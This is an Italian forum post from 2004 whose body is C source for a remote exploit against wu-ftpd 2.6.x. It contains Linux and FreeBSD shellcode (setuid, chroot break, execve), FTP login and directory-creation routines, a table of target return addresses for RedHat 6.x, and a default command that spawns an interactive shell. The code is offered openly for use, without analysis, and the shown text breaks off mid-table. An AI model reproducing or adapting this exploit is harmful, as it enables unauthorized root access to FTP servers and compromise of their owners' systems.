 |  |
 |
Nick: eLLeGi
Oggetto: re:si passate a linux
Data: 3/5/2004 10.16.38
Visite: 62
#define VERSION "v0.0.5"
#include
#include
#include
#include
#include
#include
#define DEBUG_NG
#undef DEBUG_NG
#define NRL 0
#define SCS 1
#define FAD (-1)
#define MAX_BF (16)
#define BF_LSZ (0x100) /* 256 */
#define DEF_VA 255
#define DEF_PORT 21
#define DEF_ANSH_LINUX 15
#define DEF_ANSH_FRBSD 55
#define GET_HOST_NM_ERR (NULL)
#define SIN_ZR_SIZE 8
#define DEF_ALIGN 4
#define GET_R 5000
#define DEF_NOP 64
#define DEF_STR "x0x"
#define HOME_DIR_LINUX "/home/"
#define HOME_DIR_FRBSD "/usr/home/"
#define HOME_DIR_OPBSD "/home/"
#define DEF_HOST "localhost"
#define DEF_COMM "echo \"x82 is happy, x82 is happy, x82 is happy\";" \
"uname -a;id;export TERM=vt100;exec bash -i\n"
#define DEF_COMM_OB "echo \"x82 is happy, x82 is happy, x82 is happy\";" \
"uname -a;id;export TERM=vt100;exec sh -i\n"
/* ftpd handshake */
#define FTP_CONN_SCS "220"
#define FTP_USER_FAD "331"
#define FTP_LOGIN_FAD "530 Login incorrect."
#define FTP_LOGIN_SCS "230"
#define CWD_COMM_SCS "250" /* also, RMD command */
#define MKD_COMM_SCS "257"
#define MKD_EXIST "521"
#define CMD_ERROR "500"
void ftpd_login(int sock,char *user,char *pass);
void conn_shell(int conn_sock,u_long scs_addr);
int setsock(char *u_host,int u_port);
void re_connt(int st_sock_va);
void prcode_usage(char *f_nm);
int mkd_cwd_f(int sock,int type,char *dir_nm,int gb_character);
int send_shellcode(int sock,int type,char *dir_nm);
void make_send_exploit(int sock,int type,u_long sh_addr,int d_type);
int make_retloc(int sock,int type,char *atk_bf,u_long sh_addr);
u_long null_chk(u_long sh_addr);
void banrl();
int bscann(char *chk_ban);
int check_exp(int sock);
struct os
{
int num;
char *v_nm;
u_long sh_addr;
u_long bf_addr;
char *shellcode;
int off_st;
char *home;
};
int t_g=(NRL);
char home_dir[(DEF_VA)]; /* user home directory offset */
int __exp_test=(NRL); /* check exploit test */
int b_scan=(NRL); /* banner check */
/*
** `0xff' uses two times to be realized in our shellcode.
*/
char lnx_shellcode_ffx2[]=
/* setuid/chroot-break/execve shellcode by Lam3rZ */
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb\x43\x89"
"\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31\xc9\x8d\x5e\x01"
"\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27\xcd\x80\x31\xc0\x8d\x5e\x01"
"\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9"
"\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31"
"\xc0\x88\x46\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe"
"\xc8\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\x89"
"\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0\x31\xdb\xb0"
"\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff\x30\x62\x69\x6e\x30\x73\x68\x31"
"\x2e\x2e\x31\x31";
char bsd_shellcode_ffx2[]=
/* Lam3rZ chroot() code rewritten for FreeBSD by venglin */
"\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43"
"\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0"
"\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb0\x88"
"\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80\x31"
"\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31"
"\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75\xf1"
"\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd\x80"
"\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46\x07"
"\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53\x53"
"\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\xff\xff\x30\x62\x69\x6e\x30"
"\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e\x67\x6c\x69\x6e"
"\x40\x6b\x6f\x63\x68\x61\x6d\x2e\x6b\x61\x73\x69\x65\x2e"
"\x63\x6f\x6d";
struct os plat[]=
{
/*
** I enjoy version up, will not share more. :-}
*/
{
0,"RedHat Linux 6.x Version wu-2.6.0 compile",0x0806a59c,
0x0806a082,lnx_shellcode_ffx2,(DEF_ANSH_LINUX),(HOME_DIR_LINUX)
},
{
1,"RedHat Linux 6.x Version wu-2.6.1 compile",0x0806aad8,
0x0806a082,lnx_shellcode_ffx2,(DEF_ANSH_LINUX),(HOME_DIR_LINUX)
},
{
2,"RedHat Linux 6.x Version wu-2.6.2 compile",0x0806aa60,
0x0806a082,lnx_shellcode_ffx2,(DEF_ANSH_LINUX),(HOME_DIR_LINUX)
},
{
